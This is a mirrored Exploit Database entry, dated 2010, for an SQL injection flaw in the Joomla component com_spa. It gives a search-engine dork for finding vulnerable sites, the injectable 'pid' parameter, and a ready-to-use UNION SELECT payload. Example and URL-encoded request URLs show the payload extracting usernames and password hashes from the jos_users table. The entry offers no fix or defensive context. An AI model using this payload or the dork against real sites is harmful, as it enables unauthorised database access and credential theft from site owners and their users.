Joomla! Component com_spa – SQL Injection (1)

• Exploit Database
• 115 阅读

• 作者： ALTBTA
  日期： 2010-07-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14423/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  ==================================================== Joomla Component com_spa SQL Injection Vulnerability ====================================================   Author : altbta Email: [l_9[at]hotmail[dot]com] Homepage : { www.xp10.com/xp10 } DORK:inurl:"index.php?option=com_spa" ===================================================   [+] Vulnerable File : http://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=[SQL]   [+] ExploiT : -35 UNION SELECT 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13 from jos_users--   [+] Example : http://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=-35UNION SELECT 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13 from jos_users--   [+] Demo : http://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=-35%20UNION%20SELECT%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13%20from%20jos_users--